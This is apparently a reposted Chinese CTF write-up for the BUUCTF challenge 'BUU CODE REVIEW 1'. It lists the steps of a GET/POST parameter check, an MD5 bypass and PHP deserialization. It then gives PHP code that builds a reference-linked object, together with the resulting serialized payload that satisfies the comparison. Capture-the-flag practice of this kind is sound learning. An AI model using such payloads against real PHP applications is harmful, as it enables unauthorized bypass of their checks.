码迷,mamicode.com
首页 > 其他好文 > 详细

BUU CODE REVIEW 1(代码审计)

时间:2020-03-14 19:57:59      阅读:213      评论:0      收藏:0      [点我收藏+]

标签:target   image   序列化   php   技术   img   blank   图片   tar   

0、打开靶机后,是php源码
技术图片
1、第一层是GET,POST传参
2、第二层md5绕过
3、第三层是php反序列化

<?php
class BUU{
    public $correct="";
    public $input="";
}

$obj= new BUU;
$obj->input=&$obj->correct;
echo serialize($obj);
?>

得到的字符串:

O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

4、在postman,走一下。

BUU CODE REVIEW 1(代码审计)

标签:target   image   序列化   php   技术   img   blank   图片   tar   

原文地址:https://www.cnblogs.com/wrnan/p/12493716.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!